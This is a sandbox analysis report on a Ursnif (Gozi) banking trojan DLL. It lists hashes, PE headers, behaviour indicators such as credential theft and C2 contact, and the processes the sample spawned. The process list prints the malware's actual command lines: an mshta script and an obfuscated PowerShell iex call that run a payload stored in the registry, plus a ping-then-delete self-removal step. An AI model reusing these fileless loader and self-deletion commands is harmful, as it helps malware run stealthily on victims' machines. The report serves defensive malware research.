Malware analysis f8a1d78eb7691f90053a5d7ad70588bed4c4a5cdd7bc949c368d8c2bc62f95c4.bin Malicious activity

Add for printing

File name:	f8a1d78eb7691f90053a5d7ad70588bed4c4a5cdd7bc949c368d8c2bc62f95c4.bin
Full analysis:	https://app.any.run/tasks/f3771459-62f8-48b8-a1bf-a1b182af3599
Verdict:	Malicious activity
Threats:	Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world. Malware Trends Tracker >>>
Analysis date:	July 18, 2023, 15:47:33
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 64 bit)
Tags:	gozi ursnif dreambot trojan
Indicators:
MIME:	application/x-dosexec
File info:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
MD5:	1FF3761D62CC5EE7C888A8C1BDD9D1AC
SHA1:	093CB13D256FF3E367CC8C60FE68F96582A35F29
SHA256:	F8A1D78EB7691F90053A5D7AD70588BED4C4A5CDD7BC949C368D8C2BC62F95C4
SSDEEP:	12288:/+WNeJLmTo/dgvHKRNR7PlB5D9Di/2ytQLP647vpvWhRodzXo/fGRAkMwFroD:/+Q46To/dgPOVP35ZWrs6kvonx6o

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.0.9600.18860 KB4052978
Adobe Acrobat Reader DC MUI (15.007.20033)
Adobe Flash Player 27 ActiveX (27.0.0.187)
Adobe Flash Player 27 NPAPI (27.0.0.187)
Adobe Flash Player 27 PPAPI (27.0.0.187)
CCleaner (5.35)
Google Chrome (75.0.3770.100)
Google Update Helper (1.3.33.23)
Java 8 Update 92 (64-bit) (8.0.920.14)
Java Auto Updater (2.8.92.14)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft .NET Framework 4.7.1 (4.7.02558)
Microsoft Edge (109.0.1518.115)
Microsoft Edge Update (1.3.177.11)
Microsoft Office Access MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Access MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Excel MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Groove MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Groove MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Japanese) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office IME (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (French) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (German) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office InfoPath MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Language Pack 2010 - French/Français (14.0.4763.1000)
Microsoft Office Language Pack 2010 - German/Deutsch (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Italian/Italiano (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Japanese/日本語 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Korean/한국어 (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Portuguese/Português (Brasil) (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Russian/русский (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Spanish/Español (14.0.4763.1000)
Microsoft Office Language Pack 2010 - Turkish/Türkçe (14.0.4763.1013)
Microsoft Office O MUI (French) 2010 (14.0.4763.1000)
Microsoft Office O MUI (German) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office O MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Office 32-bit Components 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (English) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (French) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (German) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office OneNote MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Outlook MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Outlook MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office PowerPoint MUI (English) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (French) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (German) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office PowerPoint MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Professional 2010 (14.0.4763.1000)
Microsoft Office Proof (Arabic) 2010 (14.0.4763.1000)
Microsoft Office Proof (Basque) 2010 (14.0.4763.1000)
Microsoft Office Proof (Catalan) 2010 (14.0.4763.1000)
Microsoft Office Proof (Dutch) 2010 (14.0.4763.1000)
Microsoft Office Proof (English) 2010 (14.0.4763.1000)
Microsoft Office Proof (French) 2010 (14.0.4763.1000)
Microsoft Office Proof (Galician) 2010 (14.0.4763.1000)
Microsoft Office Proof (German) 2010 (14.0.4763.1000)
Microsoft Office Proof (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proof (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proof (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proof (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proof (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proof (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Proof (Ukrainian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (English) 2010 (14.0.4763.1000)
Microsoft Office Proofing (French) 2010 (14.0.4763.1000)
Microsoft Office Proofing (German) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Italian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Korean) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Russian) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Proofing (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Publisher MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Publisher MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office SharePoint Designer MUI (French) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (German) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office SharePoint Designer MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared 32-bit MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared 32-bit MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Shared MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Single Image 2010 (14.0.4763.1000)
Microsoft Office Word MUI (English) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (French) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (German) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office Word MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Office X MUI (French) 2010 (14.0.4763.1000)
Microsoft Office X MUI (German) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Italian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Japanese) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Korean) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Portuguese (Brazil)) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Russian) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Spanish) 2010 (14.0.4763.1000)
Microsoft Office X MUI (Turkish) 2010 (14.0.4763.1013)
Microsoft Visual C++ 2005 Redistributable (x64) (8.0.61000)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (9.0.30729.6161)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (10.0.40219)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (11.0.61030.0)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (11.0.61030)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (115.0.2)
Mozilla Maintenance Service (115.0.2)
Notepad++ (64-bit x64) (7.5.1)
Opera 12.15 (12.15.1748)
PowerShell 7-x64 (7.2.11.0)
Skype™ 7.39 (7.39.102)
Update for Microsoft .NET Framework 4.7.1 (KB4054852) (1)
VLC media player (2.2.6)
WinRAR 5.60 (64-bit) (5.60.0)

Add for printing

MALICIOUS
- Loads dropped or rewritten executable
  - rundll32.exe (PID: 2468)
- Application was injected by another process
  - explorer.exe (PID: 1932)
- Runs injected code in another process
  - powershell.exe (PID: 2652)
- Starts CMD.EXE for self-deleting
  - explorer.exe (PID: 1932)
- Change Internet Settings
  - explorer.exe (PID: 1932)
- Connects to the CnC server
  - rundll32.exe (PID: 2468)
- URSNIF was detected
  - rundll32.exe (PID: 2468)
- Unusual connection from system programs
  - rundll32.exe (PID: 2468)
- Steals credentials
  - explorer.exe (PID: 1932)
- Actions looks like stealing of personal data
  - explorer.exe (PID: 1932)
SUSPICIOUS
- Uses RUNDLL32.EXE to load library
  - explorer.exe (PID: 1932)
- Reads the Internet Settings
  - rundll32.exe (PID: 2468)
  - mshta.exe (PID: 412)
  - explorer.exe (PID: 1932)
- Executable content was dropped or overwritten
  - csc.exe (PID: 2432)
  - csc.exe (PID: 2800)
- HTML script is executed
  - explorer.exe (PID: 1932)
- Starts CMD.EXE for commands execution
  - explorer.exe (PID: 1932)
- Runs PING.EXE to delay simulation
  - cmd.exe (PID: 2244)
- Connects to the server without a host name
  - rundll32.exe (PID: 2468)
- Starts POWERSHELL.EXE for commands execution
  - mshta.exe (PID: 412)
- Possibly malicious use of IEX has been detected
  - mshta.exe (PID: 412)
INFO
- The process checks LSA protection
  - csc.exe (PID: 2432)
  - rundll32.exe (PID: 2468)
  - csc.exe (PID: 2800)
  - cvtres.exe (PID: 2436)
  - cvtres.exe (PID: 2648)
- Reads the machine GUID from the registry
  - cvtres.exe (PID: 2648)
  - csc.exe (PID: 2800)
  - cvtres.exe (PID: 2436)
  - csc.exe (PID: 2432)
- Create files in a temporary directory
  - cvtres.exe (PID: 2648)
  - csc.exe (PID: 2432)
  - cvtres.exe (PID: 2436)
  - csc.exe (PID: 2800)
  - explorer.exe (PID: 1932)
- Checks proxy server information
  - rundll32.exe (PID: 2468)
  - explorer.exe (PID: 1932)
- Reads Internet Explorer settings
  - mshta.exe (PID: 412)
- Manual execution by a user
  - mshta.exe (PID: 412)
  - cmd.exe (PID: 2244)
  - cmd.exe (PID: 3040)
- Checks supported languages
  - csc.exe (PID: 2800)
  - cvtres.exe (PID: 2436)
  - csc.exe (PID: 2432)
  - cvtres.exe (PID: 2648)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

TRiD

.exe	\|	Win32 Executable MS Visual C++ (generic) (42.2)
.exe	\|	Win64 Executable (generic) (37.3)
.dll	\|	Win32 Dynamic Link Library (generic) (8.8)
.exe	\|	Win32 Executable (generic) (6)
.exe	\|	Generic Win/DOS Executable (2.7)

EXIF

EXE

Subsystem:	Windows GUI
SubsystemVersion:	5.1
ImageVersion:	-
OSVersion:	5.1
EntryPoint:	0x5a00
UninitializedDataSize:	-
InitializedDataSize:	735744
CodeSize:	87040
LinkerVersion:	14
PEType:	PE32
ImageFileCharacteristics:	Executable, 32-bit, DLL
TimeStamp:	2023:07:17 09:32:25+00:00
MachineType:	Intel 386 or later, and compatibles

Summary

Architecture:	IMAGE_FILE_MACHINE_I386
Subsystem:	IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date:	17-Jul-2023 09:32:25
Detected languages:	English - United States

DOS Header

Magic number:	MZ
Bytes on last page of file:	0x0090
Pages in file:	0x0003
Relocations:	0x0000
Size of header:	0x0004
Min extra paragraphs:	0x0000
Max extra paragraphs:	0xFFFF
Initial SS value:	0x0000
Initial SP value:	0x00B8
Checksum:	0x0000
Initial IP value:	0x0000
Initial CS value:	0x0000
Overlay number:	0x0000
OEM identifier:	0x0000
OEM information:	0x0000
Address of NE header:	0x00000120

PE Headers

Signature:	PE
Machine:	IMAGE_FILE_MACHINE_I386
Number of sections:	6
Time date stamp:	17-Jul-2023 09:32:25
Pointer to Symbol Table:	0x00000000
Number of symbols:	0
Size of Optional Header:	0x00E0
Characteristics:	IMAGE_FILE_32BIT_MACHINE IMAGE_FILE_DLL IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name	Virtual Address	Virtual Size	Raw Size	Charateristics	Entropy
.text	0x00001000	0x000152FB	0x00015400	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ	6.66986
.rdata	0x00017000	0x0003E7FC	0x0003E800	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	6.57269
.data	0x00056000	0x00073480	0x00072C00	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE	5.19716
.gfids	0x000CA000	0x00000044	0x00000200	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	0.573852
.rsrc	0x000CB000	0x00000490	0x00000600	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ	3.52154
.reloc	0x000CC000	0x0000123C	0x00001400	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ	6.35658

Resources

Title	Entropy	Size	Codepage	Language	Type
2	4.91161	381	UNKNOWN	English - United States	RT_MANIFEST
11	3.48153	620	UNKNOWN	English - United States	RT_STRING

Imports


KERNEL32.dll

Exports

Title	Ordinal	Address
StartDll	1	0x00001000
JfQVjr71	2	0x00016150
RHV0d6	3	0x00015990

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

412

"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Wu6m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wu6m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\BBE2C839-DEF8-A50A-C01F-F2A9F4C346ED\\\SettingsDevice'));if(!window.flag)close()</script>"

C:\Windows\System32\mshta.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft (R) HTML Application host

Exit code:

Version:

11.00.9600.16428 (winblue_gdr.131013-1700)

Modules

Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\mshtml.dll

1932

C:\Windows\Explorer.EXE

C:\Windows\explorer.exe

—

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Explorer

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll

2244

"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\admin\AppData\Local\Temp\f8a1d78eb7691f90053a5d7ad70588bed4c4a5cdd7bc949c368d8c2bc62f95c4.bin.exe"

C:\Windows\System32\cmd.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

6.1.7601.17514 (win7sp1_rtm.101119-1850)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll

2372

"C:\Windows\System32\rundll32.exe" "C:\Users\admin\AppData\Local\Temp\f8a1d78eb7691f90053a5d7ad70588bed4c4a5cdd7bc949c368d8c2bc62f95c4.bin.exe", StartDll

C:\Windows\System32\rundll32.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows host process (Rundll32)

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll

2432

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\ofpcssg4.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Visual C# Command Line Compiler

Exit code:

Version:

4.7.2558.0 built by: NET471REL1

Modules

Images
c:\windows\microsoft.net\framework64\v4.0.30319\csc.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\gdi32.dll

2436

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA18E.tmp" "c:\Users\admin\AppData\Local\Temp\CSCBBF55137617E4DE8913FA0B3BE64DA93.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

—

csc.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft® Resource File To COFF Object Conversion Utility

Exit code:

Version:

12.00.52519.0 built by: VSWINSERVICING

Modules

Images
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\cryptsp.dll

2468

"C:\Windows\System32\rundll32.exe" "C:\Users\admin\AppData\Local\Temp\f8a1d78eb7691f90053a5d7ad70588bed4c4a5cdd7bc949c368d8c2bc62f95c4.bin.exe", StartDll

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows host process (Rundll32)

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\syswow64\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\user32.dll
c:\windows\syswow64\kernelbase.dll

2628

ping localhost -n 5

C:\Windows\System32\PING.EXE

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

TCP/IP Ping Command

Exit code:

Version:

6.1.7600.16385 (win7_rtm.090713-1255)

Modules

Images
c:\windows\system32\ping.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\nsi.dll

2648

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RESA111.tmp" "c:\Users\admin\AppData\Local\Temp\CSCF2A8F8C9D2C646179DF893D2D15BC2C7.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

—

csc.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft® Resource File To COFF Object Conversion Utility

Exit code:

Version:

12.00.52519.0 built by: VSWINSERVICING

Modules

Images
c:\windows\system32\ntdll.dll
c:\windows\microsoft.net\framework64\v4.0.30319\cvtres.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\msvcr120_clr0400.dll
c:\windows\system32\cryptsp.dll

2652

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name pphwfvddnj -value gp; new-alias -name putxbk -value iex; putxbk ([System.Text.Encoding]::ASCII.GetString((pphwfvddnj "HKCU:Software\AppDataLow\Software\Microsoft\BBE2C839-DEF8-A50A-C01F-F2A9F4C346ED").ComputerVirtual))

